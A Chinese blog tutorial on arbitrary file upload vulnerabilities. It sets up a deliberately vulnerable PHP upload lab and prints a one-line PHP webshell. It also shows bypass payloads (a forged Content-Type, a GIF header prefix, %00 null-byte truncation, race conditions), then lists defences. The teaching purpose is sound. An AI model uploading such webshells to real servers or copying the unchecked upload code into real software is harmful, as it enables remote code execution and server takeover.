3、任意文件上传漏洞

已于 2024-01-10 02:40:30 修改
阅读量887 收藏 10
点赞数 19
分类专栏: Web漏洞(后端) 文章标签: 网络安全 安全 笔记 经验分享
于 2024-01-07 01:02:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74152774/article/details/135434575
版权
本文详细阐述了文件上传漏洞的原理、利用方法,包括利用PHP脚本执行、XSS攻击、拒绝服务,以及如何通过文件类型、头限制和后缀追加进行漏洞绕过。同时,文中还探讨了漏洞挖掘的常见位置和针对此类漏洞的防御措施。
摘要由CSDN通过智能技术生成

1、概述

定义: 文件上传漏洞( Unrestricted File Upload)网站上传功能过滤不严格,导致用户可通过上传文件对系统造成危害。

上传服务端可解析的脚本文件造成远程代码执行、上传超大文件造成拒绝服务、上传Html文件引发XSS等。

分类: Web通用漏洞

风险等级: 严重/中危

危害:上传文件Getshell/上传HTML文件实现XSS攻击、上传超大文件引发拒绝服务等

2、漏洞原理+利用

漏洞示例:

在本地的phpstudy中搭建一个简单的靶场

<html>
<form action="http://127.0.0.1/upload.php"
method="POST" enctype="multipart/form-data">
<input name="a" type="file"></input>
<input name="b" ></input>
<input type="submit"></input>
</form>
</html>
<?php
var_dump($_POST['b']);
var_dump($_FILES);
move_uploaded_file($_FILES["a"]["tmp_name"],"
./upload/" . $_FILES["a"]["name"]);
?>

需要在同目录下创建一个upload文件夹

漏洞利用:

上传一个一句话木马,然后用蚁剑远程连接。

<?php eval($_POST['1'])?>
  • 通过上传GetShell。对于服务器直接支持解析的文件格式,只需要上传该后缀的文件即可。这种
    情况下的漏洞也被称作任意文件上传。
  • 通过上传实现XSS攻击。上传HTML文件时,在其中插入XSS代码实现XSS攻击。
  • 通过上传实现服务器拒绝服务。上传超大文件,或当服务器自动执行解压操作时,上传畸形的压
    缩包文件实现拒绝服务。

文件上传+环境解析 = WebShell
文件上传+任意路径控制 = 文件覆盖(WebShell)
文件上传 - 环境解析 - 路径控制 = XSS
文件上传-环境解析+无大小限制=拒绝服务

3、漏洞绕过

文件类型限制:

<?php
if($_FILES['a']['type'] != "image/gif")
{
    die("Sorry,we only allow uploading GIF images");
}    
?>

绕过:

------WebKitFormBoundaryU1lrzLiplUyRrlHJ
Content-Disposition: form-data; name="a"; filename="filename.php"
Content-Type: text/php image/gif
file_content <?php eval($_GET['a'])?>
------WebKitFormBoundaryU1lrzLiplUyRrlHJ

文件头限制:

<?php
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$filename = '1.php';
echo finfo_file($finfo,$filename);
?>

绕过:

添加一个GIF(也就是可以上传到服务器上的文件类型)的文件头就可以。

47494638 39613804 A005F700 00000000   |   GIF89a8
0509080A 09050B0C 0B120E0D 0E0F100F   |
11101211 0E131313 1A151316 16191719   |

文件后缀追加限制:

<?php
var_dump($_POST['a']);
var_dump($_FILES);
move_uploaded_file($_FILES["a"]["tmp_name"],"./upload" .$_POST['a'].'.jpg');
?>

绕过:

使用%00截断。 要求:PHP版本 < 5.3.4
------WebKitFormBoundaryU1lrzLiplUyRrlHJ
Content-Disposition: form-data; name="a"
1.php0x00
------WebKitFormBoundaryU1lrzLiplUyRrlHJ

条件竞争: 恶意文件上传后被检测到立马被删除,攻击者在他被删除前使用自动化工具快速频繁的请求该文件。

4、漏洞挖掘

一般都在可以上传文件的位置,像上传头像照片等。

5、漏洞防御

1.严格限制上传文件后缀

2.对于无法限制文件后缀的情况,可以严格限制上传目录(防御../跳出目录),
同时将该目录设置为不可解析(octet-stream)。将其他目录设置为不可写入。

3.使用分站存储上传文件,分站不开启脚本资源解析。

 

DarkByte-
关注
专栏目录
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
《WEB安全漏洞30讲》(第5讲)任意文件上传漏洞
午夜安全
05-22 3422
文件上传漏洞,指攻击者利用程序缺陷绕过系统对文件的验证与处理策略将恶意程序上传到服务器并获得执行服务器端命令的能力。这个漏洞其实非常简单,就是攻击者给服务器上传了恶意的木马程序,然后利用此木马程序执行操作系统命令,从而获得服务器权限,造成严重的安全隐患。比如一个JAVA系统本来需要上传身份证图片进行用户实名认证,结果恶意用户上传了jsp木马文件,之后利用这个文件执行系统命令,再以这个系统为据点,对内网其他互通的系统进行攻击,这样将导致整个内网系统的沦陷。
文件上传漏洞
热门推荐
weixin_59872639的博客
02-22 1万+
文件上传 文件上传是现代互联网常见的功能,允许用户上传图片、视频、及其他类型文件,向用户提供的功能越多,Web受攻击的风险就越大。 文件上传漏洞 上传文件时,如果未对上传的文件进行严格的验证和过滤,就容易造成文件上传漏洞,上传脚本文件(包括asp、aspx、php、jsp等) 恶意上传行为可能导致网站甚至整个服务器被控制。恶意的脚本文件又被称为WebShell,WebShell具有强大的功能,如查看服务器目录、服务器中文件、执行系统命令等。 文件上传漏洞成因 文件上传漏洞的成因(复杂),一方
10.任意文件上传漏洞(超详细!!!)
最新发布
m0_72760503的博客
08-03 931
任意文件下载漏洞:允许攻击者从服务器下载任意文件,这可能导致敏感信息泄露、服务器被控制等安全风险。这种漏洞通常由于应用程序没有对用户输入进行充分的验证和过滤而导致攻击者可以利用多种技术来执行任意文件下载,包括本地文件包含(LFI)、远程文件包含(RFI)、目录遍历和服务器端请求伪造(SSRF)等。这些技术通常通过构造特殊的URL参数或请求头来实现,例如使用…/进行目录遍历或利用文件读取函数的漏洞来读取服务器上的敏感文件。
网络安全进阶学习第五课——文件上传漏洞
p36273的博客
07-03 4956
黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。getimagesize()函数会读取目标文件的16进制,验证目标文件16进制的头几个字符串是否符合图片的要求,通过此函数判断文件类型。通常在一个请求中,同样名称的参数只会出现一次,函数包含的文件都会被当作PHP代码执行,无论文件的名称是什么,只要符合文件内容符合PHP代码规范,都会被当作PHP代码执行。
任意文件上传漏洞原理及上传利用案例(任意文件上传漏洞怎么解决)
白帽黑客八哥的博客
12-18 1828
任意文件上传漏洞是一种Web应用程序中常见的安全漏洞,攻击者通过该漏洞可以上传恶意文件到服务器上。这可能导致多种安全问题,包括远程代码执行、服务器拒绝服务等。通常,攻击者通过构造特定的文件上传请求,绕过应用程序的文件类型验证和访问控制,成功上传具有恶意代码的文件。
任意文件上传漏洞
gaomei2009的专栏
08-24 2333
任意文件上传漏洞
phpcmsv9.0任意文件上传漏洞解析
01-19
漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:...
wordpress 评论插件 wpDiscuz 任意文件上传漏洞分析1
08-03
【WordPress wpDiscuz 评论插件任意文件上传漏洞分析】 WordPress 是一款广泛使用的开源内容管理系统,而 wpDiscuz 是一个流行的评论插件,它为 WordPress 网站提供了丰富的交互式评论功能。然而,如同任何软件一样...
任意文件上传漏洞详解与防护
鑫和皓的博客
08-10 1887
任意文件上传漏洞是一种常见的网络安全问题,它允许攻击者上传并执行恶意文件,从而获取或破坏系统数据。上传恶意脚本:攻击者可以上传包含恶意代码的脚本文件,如PHP、ASP、JSP等,然后通过浏览器访问这些文件,执行恶意代码。上传恶意二进制文件:攻击者可以上传包含恶意代码的二进制文件,如DLL、EXE等,然后利用其他漏洞或手段执行这些文件。严格检查上传文件:对上传文件的类型、大小、名字和内容进行严格的检查,只接受符合要求的文件。使用安全编程技术:在编写文件上传功能时,使用安全编程技术,如预备语句、输入验证等。
任意文件上传漏洞(简介)
diaobusi的博客
08-22 683
文件上传是指将文件从本地计算机或其他设备上传到网络服务器或其他存储位置的过程。通过文件上传,您可以将文件(如图像、文档、音频或视频等)传输到网络上的不同位置,以实现文件共享、备份、存储或与他人共享内容等目的。用户选择要上传的文件:用户在自己的设备上选择要上传的文件,可能通过文件资源管理器、拖放文件或选择文件对话框等方式进行。文件被传输至服务器:一旦用户选择文件,通过网络将文件发送到特定的服务器。可以使用各种协议,如HTTP、FTP、SFTP等来实现文件传输。
【WEB漏洞原理】任意文件上传漏洞
过期的秋刀鱼
08-29 2563
文件上传是web应用必备功能之一,如:头像上传,附件分享登,如果服务器配置不当或者 没有进行足够的过滤,Web用户就可以上传任意文件,包括恶意脚本文件,exe 程序等等,这就造成了任意文件上传漏洞
文件上传漏洞篇02任意文件上传漏洞方法和攻击方法
qq_61861243的博客
04-16 924
头像上传、修改上传,文件编辑器中文件上传、图片上传、媒体上传。举例:通过抓包上传恶意文件进行测试,上传后缀名为asp、php、aspx等动态语言脚本,查看上传时返回的信息,判断是否能直接上传,如果不能直接上传,再进行此时上传突破。(例如:上传文件的时候只允许图片格式 的后缀,但修改文件却没有限制后缀名,图片文件就可以修改成php文件,就有可能访问这个文件的URL(网址)直接getshell(获取),控制网站。
web漏洞文件上传漏洞
wutiangui的博客
06-22 2082
严重:本地文件包含不仅能够包含web文件目录中的一些配置文件(比如Web应用、数据库配置文件、config文件),还可以查看到一些Web动态页面的源代码,为攻击者进一步发掘web应用漏洞提供条件,甚至一旦与路径遍历漏洞相结合,还可能直接攫取目标系统的用户名与密码等文件。在PHP中,使用include、require、include_once、require_once函数包含的文件都会被当作PHP代码执行,无论文件的名称是什么,只要符合文件内容符合PHP代码规范,都会被当作PHP代码执行。
文件上传漏洞-原理篇
AkangBoy的博客
12-02 3540
本文主要介绍文件上传漏洞原理、危害等基础知识,以及常见的文件上传检测机制和绕过手段
文件上传漏洞(全网最详细)
m0_59598029的博客
04-02 1203
自从学完文件上传后,寻思总结一下,但一直懒惰向后推迟,最近要准备面试了,就趁此机会写一下。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。
H3C CVM 前台任意文件上传漏洞详解
"H3C CVM 前台任意文件上传漏洞" H3C CVM 前台任意文件上传漏洞是一种严重的安全漏洞,可能会导致攻击者上传恶意文件,进而控制服务器或盗取敏感数据。本文将详细介绍该漏洞的原理、影响范围、检测方法和修复方案。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值